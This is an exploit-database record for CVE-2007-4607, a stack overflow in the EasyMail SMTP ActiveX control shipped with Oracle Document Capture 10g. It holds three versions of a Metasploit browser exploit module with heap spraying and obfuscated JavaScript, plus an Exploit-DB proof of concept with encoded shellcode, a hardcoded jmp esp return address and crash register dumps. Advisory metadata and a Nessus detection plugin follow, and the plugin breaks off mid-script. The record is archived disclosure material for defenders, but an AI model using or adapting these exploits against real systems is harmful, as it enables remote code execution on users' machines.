ID PACKETSTORM:84575
Type packetstorm
Reporter MC
Modified 2009-12-31T00:00:00
Description
`###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Document Capture 10g ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Oracle Document Capture 10g (10.1.3.5.0).
Oracle Document Capture 10g comes bundled with a third party ActiveX control
emsmtp.dll (6.0.1.0). When passing a overly long string to the method "SubmitToExpress"
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'CVE', '2007-4607' ],
[ 'OSVDB', '38335' ],
[ 'BID', '25467' ],
[ 'US-CERT-VU', '281977' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Aug 28 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
], self.class)
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# fluff..
fluff = rand_text_english(rand(20) + 1)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
js = %Q|
try {
var evil_string = "";
var index;
var vulnerable = new ActiveXObject('EasyMail.SMTP.6');
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);
for (index = 0; index < 12500; index++) {
evil_string = evil_string + my_unescape('%0a%0a%0a%0a');
}
vulnerable.SubmitToExpress(evil_string);
} catch( e ) { window.location = 'about:blank' ; }
|
opts = {
'Strings' => true,
'Symbols' => {
'Variables' => [
'vulnerable',
'shellcode',
'my_unescape',
'index',
'evil_string',
]
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
js.update_opts(js_heap_spray.opts)
js.obfuscate()
content = %Q|
<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
`
{"id": "PACKETSTORM:84575", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", "description": "", "published": "2009-12-31T00:00:00", "modified": "2009-12-31T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://packetstormsecurity.com/files/84575/Oracle-Document-Capture-10g-ActiveX-Control-Buffer-Overflow.html", "reporter": "MC", "references": [], "cvelist": ["CVE-2007-4607"], "lastseen": "2016-12-05T22:24:59", "viewCount": 4, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2016-12-05T22:24:59", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4607"]}, {"type": "exploitdb", "idList": ["EDB-ID:16579", "EDB-ID:4328"]}, {"type": "osvdb", "idList": ["OSVDB:38335"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ORACLE_DC_SUBMITTOEXPRESS"]}, {"type": "nessus", "idList": ["EASYMAIL_OBJECTS_SMTP_ACTIVEX_OVERFLOWS.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13035", "SECURITYVULNS:DOC:29282"]}], "modified": "2016-12-05T22:24:59", "rev": 2}, "vulnersScore": 8.2}, "sourceHref": "https://packetstormsecurity.com/files/download/84575/oracle_dc_submittoexpress.rb.txt", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle Document Capture 10g ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Oracle Document Capture 10g (10.1.3.5.0). \nOracle Document Capture 10g comes bundled with a third party ActiveX control \nemsmtp.dll (6.0.1.0). When passing a overly long string to the method \"SubmitToExpress\" \nan attacker may be able to execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision: 7724 $', \n'References' => \n[ \n[ 'CVE', '2007-4607' ], \n[ 'OSVDB', '38335' ], \n[ 'BID', '25467' ], \n[ 'US-CERT-VU', '281977' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] \n], \n'DisclosureDate' => 'Aug 28 2009', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ]) \n], self.class) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# fluff.. \nfluff = rand_text_english(rand(20) + 1) \n \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \njs = %Q| \ntry { \nvar evil_string = \"\"; \nvar index; \nvar vulnerable = new ActiveXObject('EasyMail.SMTP.6'); \nvar my_unescape = unescape; \nvar shellcode = '#{shellcode}'; \n#{js_heap_spray} \nsprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000); \nfor (index = 0; index < 12500; index++) { \nevil_string = evil_string + my_unescape('%0a%0a%0a%0a'); \n} \nvulnerable.SubmitToExpress(evil_string); \n} catch( e ) { window.location = 'about:blank' ; } \n| \n \nopts = { \n'Strings' => true, \n'Symbols' => { \n'Variables' => [ \n'vulnerable', \n'shellcode', \n'my_unescape', \n'index', \n'evil_string', \n] \n} \n} \njs = ::Rex::Exploitation::ObfuscateJS.new(js, opts) \njs.update_opts(js_heap_spray.opts) \njs.obfuscate() \ncontent = %Q| \n<html> \n<body> \n<script><!-- \n#{js} \n//</script> \n</body> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n"}
{"cve": [{"lastseen": "2021-02-02T05:31:26", "description": "Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and other products, allows remote attackers to execute arbitrary code via a long argument to the SubmitToExpress method, a different vulnerability than CVE-2007-1029. NOTE: this may have been fixed in version 6.0.3.15.", "edition": 4, "cvss3": {}, "published": "2007-08-31T00:17:00", "title": "CVE-2007-4607", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4607"], "modified": "2018-08-28T17:29:00", "cpe": ["cpe:/a:quicksoft:easymail_objects:*", "cpe:/a:gate_comm_software:postcast_server_pro:3.0.61"], "id": "CVE-2007-4607", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4607", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gate_comm_software:postcast_server_pro:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:a:quicksoft:easymail_objects:*:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-4607"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24199](https://secuniaresearch.flexerasoftware.com/advisories/24199/)\n[Secunia Advisory ID:26639](https://secuniaresearch.flexerasoftware.com/advisories/26639/)\nOther Advisory URL: http://milw0rm.com/exploits/4328\nOther Advisory URL: http://retrogod.altervista.org/postcast-emsmtp_bof.html\nISS X-Force ID: 36307\n[CVE-2007-4607](https://vulners.com/cve/CVE-2007-4607)\nCERT VU: 281977\nBugtraq ID: 25467\n", "edition": 1, "modified": "2007-08-28T00:00:00", "published": "2007-08-28T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38335", "id": "OSVDB:38335", "title": "PostCast Server EasyMailSMTPObj ActiveX (emsmtp.dll) SubmitToExpress Method Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:39:57", "description": "Postcast Server Pro 3.0.61 / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF. CVE-2007-4607. Remote exploit for windows platform", "published": "2007-08-28T00:00:00", "type": "exploitdb", "title": "Postcast Server Pro 3.0.61 / Quiksoft EasyMail emsmtp.dll 6.0.1 BoF", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4607"], "modified": "2007-08-28T00:00:00", "id": "EDB-ID:4328", "href": "https://www.exploit-db.com/exploits/4328/", "sourceData": "<!-- Postcast Server Pro 3.0.61 / Quiksoft EasyMail SMTP Object (emsmtp.dll 6.0.1)\n remote buffer overflow exploit\n (ie6 / xp sp2 version)\n\npassing more than 539 chars to SubmitToExpress method:\n\nEAX 00000400\nECX 0013DD24 ASCII \"Error Creating File: AAAA ...\nEDX C0403FFF\nEBX FFFFFFFF\nESP 0013D5E4\nEBP 0013DD08\nESI 41414141\nEDI 0013DD24 ASCII \"Error Creating File: AAAA ...\nEIP 06986256 emsmtp.06986256\n\n...\nCMP DWORD PTR DS:[ESI+180],1\nAccess violation when reading 414142C1\n\nseh overwrite follows:\n\nEAX 00000000\nECX 41414141\nEDX 7C9137D8 ntdll.7C9137D8\nEBX 00000000\nESP 0013D214\nEBP 0013D234\nESI 00000000\nEDI 00000000\nEIP 41414141\n\nand if we pass a readable address to ESI:\n\nA*539 + esi + A*99999\n\nwe fall in a more convenient\nsituation:\n\nEAX 00000000\nECX 0013DF7C ASCII \"AAAA...\nEDX 001835D0\nEBX 00000000\nESP 0013DF68 ASCII \"AAAA...\nEBP 41414141\nESI 05542A08\nEDI 05586250 ASCII \"AAAA...\nEIP 41414141\n\nObject safety report:\nRegKey Safe for Script: true\nRegKey Safe for Init: true\n\nvendor urls: http://www.postcastserver.com/\n http://www.quicksoftcorp.com/\n\nrgod.\nsite: http://retrogod.altervista.org\n->\n\n\n<html>\n<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='EasyMailSMTPObj' /></object>\n<script language='vbscript'>\n\n 'open calc.exe\n scode = unescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49\") & _\n unescape(\"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36\") & _\n unescape(\"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34\") & _\n unescape(\"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41\") & _\n unescape(\"%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54\") & _\n unescape(\"%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37\") & _\n unescape(\"%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48\") & _\n unescape(\"%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38\") & _\n unescape(\"%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c\") & _\n unescape(\"%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e\") & _\n unescape(\"%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48\") & _\n unescape(\"%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54\") & _\n unescape(\"%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38\") & _\n unescape(\"%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43\") & _\n unescape(\"%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37\") & _\n unescape(\"%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a\") & _\n unescape(\"%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b\") & _\n unescape(\"%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33\") & _\n unescape(\"%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57\") & _\n unescape(\"%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49\") & _\n unescape(\"%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36\") & _\n unescape(\"%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a\")\n\n\nesi = unescape(\"%01%01%01%01\")\nebp = \"bbbb\"\nnop = string(16,unescape(\"%90\"))\neip = unescape(\"%78%2c%41%7e\") '0x7E412C78 jmp esp user32.dll\nbof = string(539,\"A\") + esi + ebp + eip + nop + scode\n\nEasyMailSMTPObj.SubmitToExpress bof\n\n</script>\n</html>\n\n# milw0rm.com [2007-08-28]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/4328/"}, {"lastseen": "2016-02-02T00:10:56", "description": "Oracle Document Capture 10g ActiveX Control Buffer Overflow. CVE-2007-4607. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4607"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16579", "href": "https://www.exploit-db.com/exploits/16579/", "sourceData": "##\r\n# $Id: oracle_dc_submittoexpress.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Oracle Document Capture 10g ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\r\n\t\t\t\tOracle Document Capture 10g comes bundled with a third party ActiveX control\r\n\t\t\t\temsmtp.dll (6.0.1.0). When passing a overly long string to the method \"SubmitToExpress\"\r\n\t\t\t\tan attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-4607' ],\r\n\t\t\t\t\t[ 'OSVDB', '38335' ],\r\n\t\t\t\t\t[ 'BID', '25467' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '281977' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Aug 28 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# fluff..\r\n\t\tfluff = rand_text_english(rand(20) + 1)\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\tjs = %Q|\r\n\t\t\ttry {\r\n\t\t\t\tvar evil_string = \"\";\r\n\t\t\t\tvar index;\r\n\t\t\t\t# CLSID:68AC0D5F-0424-11D5-822F-00C04F6BA8D9\r\n\t\t\t\tvar vulnerable = new ActiveXObject('EasyMail.SMTP.6');\r\n\t\t\t\tvar my_unescape = unescape;\r\n\t\t\t\tvar shellcode = '#{shellcode}';\r\n\t\t\t\t#{js_heap_spray}\r\n\t\t\t\tsprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\r\n\t\t\t\tfor (index = 0; index < 12500; index++) {\r\n\t\t\t\t\tevil_string = evil_string + my_unescape('%0a%0a%0a%0a');\r\n\t\t\t\t}\r\n\t\t\t\tvulnerable.SubmitToExpress(evil_string);\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t|\r\n\r\n\t\topts = {\r\n\t\t\t'Strings' => true,\r\n\t\t\t'Symbols' => {\r\n\t\t\t\t'Variables' => [\r\n\t\t\t\t\t'vulnerable',\r\n\t\t\t\t\t'shellcode',\r\n\t\t\t\t\t'my_unescape',\r\n\t\t\t\t\t'index',\r\n\t\t\t\t\t'evil_string',\r\n\t\t\t\t]\r\n\t\t\t}\r\n\t\t}\r\n\t\tjs = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\r\n\t\tjs.update_opts(js_heap_spray.opts)\r\n\t\tjs.obfuscate()\r\n\t\tcontent = %Q|\r\n\t\t\t<html>\r\n\t\t\t<body>\r\n\t\t\t\t<script><!--\r\n\t\t\t\t#{js}\r\n\t\t\t\t//</script>\r\n\t\t\t</body>\r\n\t\t\t</html>\r\n\t\t\t|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16579/"}], "metasploit": [{"lastseen": "2020-03-18T20:13:15", "description": "This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third party ActiveX control emsmtp.dll (6.0.1.0). When passing an overly long string to the method \"SubmitToExpress\" an attacker may be able to execute arbitrary code.\n", "published": "2009-11-15T01:01:21", "type": "metasploit", "title": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4607"], "modified": "2017-10-05T21:44:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ORACLE_DC_SUBMITTOEXPRESS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle Document Capture 10g ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n Oracle Document Capture 10g comes bundled with a third party ActiveX control\n emsmtp.dll (6.0.1.0). When passing an overly long string to the method \"SubmitToExpress\"\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-4607' ],\n [ 'OSVDB', '38335' ],\n [ 'BID', '25467' ],\n [ 'US-CERT-VU', '281977' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\n ],\n 'DisclosureDate' => 'Aug 28 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ])\n ])\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # fluff..\n fluff = rand_text_english(rand(20) + 1)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n js = %Q|\n try {\n var evil_string = \"\";\n var index;\n // CLSID:68AC0D5F-0424-11D5-822F-00C04F6BA8D9\n var vulnerable = new ActiveXObject('EasyMail.SMTP.6');\n var my_unescape = unescape;\n var shellcode = '#{shellcode}';\n #{js_heap_spray}\n sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\n for (index = 0; index < 12500; index++) {\n evil_string = evil_string + my_unescape('%0a%0a%0a%0a');\n }\n vulnerable.SubmitToExpress(evil_string);\n } catch( e ) { window.location = 'about:blank' ; }\n |\n\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => [\n 'vulnerable',\n 'shellcode',\n 'my_unescape',\n 'index',\n 'evil_string',\n ]\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.update_opts(js_heap_spray.opts)\n js.obfuscate(memory_sensitive: true)\n content = %Q|\n <html>\n <body>\n <script><!--\n #{js}\n //</script>\n </body>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/oracle_dc_submittoexpress.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2009-4663", "CVE-2007-4607"], "description": "Buffer overflows, unsafe method.", "edition": 1, "modified": "2013-04-28T00:00:00", "published": "2013-04-28T00:00:00", "id": "SECURITYVULNS:VULN:13035", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13035", "title": "Borland ActiveX security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2009-4663", "CVE-2007-4607"], "description": "\r\n\r\nBorland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows\r\n\r\nActiveX settings:\r\nBinary path: C:\Program Files (x86)\Borland\CaliberRM\emsmtp.dll\r\nVersion: 5.0.0.11\r\nProgID: EasyMail.SMTP.5\r\nCLSID: {4610E7BF-710F-11D3-813D-00C04F6B92D0}\r\nSafe for Scripting: True\r\nSafe for Initialization: True\r\n\r\n\r\nSubmitToExpress and AddAttachment methods are vulnerable see CVE-2007-4607\r\nand CVE-2009-4663\r\n\r\n//rgod\r\n", "edition": 1, "modified": "2013-04-28T00:00:00", "published": "2013-04-28T00:00:00", "id": "SECURITYVULNS:DOC:29282", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29282", "title": "Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-03-01T02:07:34", "description": "EasyMail Objects, a set of COM objects for supporting email \nprotocols, is installed on the remote Windows host. It may have been \nbundled with a third-party application, such as Oracle Document \nCapture, Earthlink internet access software, Borland Caliber RM \nClient, and FrontRange Heat.\n\nThe SMTP component of the version of this control installed on the\nremote host reportedly contains multiple buffer overflows involving \nthe AddAttachment and SubmitToExpress methods that could lead to \narbitrary code execution on the affected system. Successful \nexploitation requires, though, that an attacker trick a user on the\naffected host into visiting a specially crafted web page.", "edition": 25, "published": "2007-09-25T00:00:00", "title": "EasyMail SMTP Object ActiveX Control Multiple Buffer Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4663", "CVE-2007-4607"], "modified": "2021-03-02T00:00:00", "cpe": [], "id": "EASYMAIL_OBJECTS_SMTP_ACTIVEX_OVERFLOWS.NASL", "href": "https://www.tenable.com/plugins/nessus/26185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26185);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2007-4607\", \"CVE-2009-4663\");\n script_bugtraq_id(25467, 36440);\n script_xref(name:\"CERT\", value:\"281977\");\n script_xref(name:\"EDB-ID\", value:\"4328\");\n script_xref(name:\"EDB-ID\", value:\"9705\");\n\n script_name(english:\"EasyMail SMTP Object ActiveX Control Multiple Buffer Overflows\");\n script_summary(english:\"Checks version of EasyMail SMTP Object control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflow vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"EasyMail Objects, a set of COM objects for supporting email \nprotocols, is installed on the remote Windows host. It may have been \nbundled with a third-party application, such as Oracle Document \nCapture, Earthlink internet access software, Borland Caliber RM \nClient, and FrontRange Heat.\n\nThe SMTP component of the version of this control installed on the\nremote host reportedly contains multiple buffer overflows involving \nthe AddAttachment and SubmitToExpress methods that could lead to \narbitrary code execution on the affected system. Successful \nexploitation requires, though, that an attacker trick a user on the\naffected host into visiting a specially crafted web page.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/526440/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either disable its use from within Internet Explorer by setting its\nkill bit or remove it completely.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Document Capture 10g ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, 'activex_init');\n\n\n# 